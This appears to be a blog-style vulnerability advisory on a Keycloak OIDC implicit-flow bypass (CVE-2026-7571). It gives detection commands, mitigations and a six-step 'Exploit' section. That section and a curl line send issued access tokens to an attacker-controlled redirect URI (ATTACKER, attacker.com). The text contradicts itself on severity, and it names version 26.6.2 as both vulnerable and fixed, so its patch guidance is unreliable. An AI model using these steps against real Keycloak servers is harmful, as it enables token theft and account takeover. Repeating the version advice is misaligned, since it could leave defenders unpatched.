Keycloak, OIDC Implicit Flow Bypass, CVE-2026-7571 (Critical) -DC-Jun2026-163

By /

Listen to this Post

CVE-2026-7571 exposes a critical flaw in Keycloak’s OpenID Connect (OIDC) implementation. A low-privilege attacker, possessing a valid user’s credentials and the target client ID, can bypass security controls designed to disable the insecure OIDC implicit flow.
The vulnerability originates from improper session state handling during client restarts. When a client session restarts, Keycloak fails to maintain the security context that prevents the implicit flow. By forging client data—specifically a manipulated `client_data` parameter—the attacker can effectively reactivate the implicit flow for a client where it was disabled.
This attack chain is possible due to a weakness classified as CWE-472 (External Control of Assumed-Immutable Web Parameter). The implicit flow, a legacy OIDC method that returns access tokens directly in the redirect URL, is generally disabled for modern clients due to its inherent security risks. However, by tampering with session data, the attacker coerces the server into issuing an access token via this forbidden flow.
The attack’s technical mechanics involve the `SessionCodeChecks` component during the login flow restart. A standard login attempt is initiated, but just before the authorization response is sent, the attacker intervenes to restart the session. During this restart, the client’s security configuration is not re-validated, allowing the injection of parameters that request the implicit flow.
The manipulated request contains a modified `client_data` parameter, which includes a different redirect_uri. The server, failing to validate this change against the initial client configuration, processes the flow and issues an access token directly to this attacker-controlled URI.
The impact is severe. Not only does the attacker gain an unauthorized access token, but these tokens are also leaked through multiple channels. Access tokens appear in server logs, proxy logs, and HTTP Referrer headers, leading to significant sensitive information disclosure. The vulnerability has a CVSS v3.1 base score of 7.1 (HIGH) from Red Hat, with the vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N, indicating a network-exploitable flaw with low attack complexity requiring low privileges.

DailyCVE Form:

Platform: Keycloak
Version: 26.3.0-26.6.2
Vulnerability : Implicit Flow Bypass
Severity: 7.1 (HIGH)
date: 2026-05-19

Prediction: 2026-05-21

What Undercode Say:

Check Keycloak version
$ keycloak/bin/kc.sh version
$ cat META-INF/keycloak-version.txt
Detect vulnerable implicit flow endpoint
$ curl -k "https://KEYCLOAK_HOST/auth/realms/REALM/protocol/openid-connect/auth?response_type=token&client_id=VULN_CLIENT&redirect_uri=http://ATTACKER/"
Monitor logs for anomalous "client_data" entries
$ journalctl -u keycloak | grep -i "client_data|implicit|redirect_uri"

Exploit:

  1. Prerequisites: A valid user credential, a client ID with implicit flow disabled, network access to the Keycloak instance.
  2. Initiate: Begin a standard OIDC authorization request for the target client.
  3. Intercept: Capture the request and modify it mid-session. Spoof the session restart by manipulating the `client_data` parameter.
  4. Forge: In the client_data, set `redirect_uri` to a server you control (e.g., https://attacker.com/callback`) and includeresponse_type=token`.
  5. Acquire: Send the request. Keycloak processes the restarted session without re-validating security controls and issues an access token directly to your redirect_uri.
  6. Leak: The access token is also exposed in the server’s access.log, proxy logs, and HTTP Referrer headers, enabling further attacks and data harvesting.

Protection:

  • Patch: Immediately upgrade Keycloak to version 26.6.2 or higher. This release contains a backported fix for the bypass.
  • Network Controls: Implement strict firewall rules to restrict network access to Keycloak authentication endpoints, limiting the attack surface.
  • Log Sanitization: Disable or redact sensitive data (e.g., authorization headers, tokens) from all logs (server, proxy, access) to prevent information leakage.
  • Deprecate Implicit Flow: If using older clients, migrate them to the Authorization Code Flow with PKCE, eliminating reliance on the implicit flow entirely.

Impact:

  • Account Takeover: Attackers gain valid access tokens, allowing them to impersonate the compromised user against any application trusting the Keycloak realm. This leads to complete account takeover and unauthorized access to sensitive data and functionalities.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top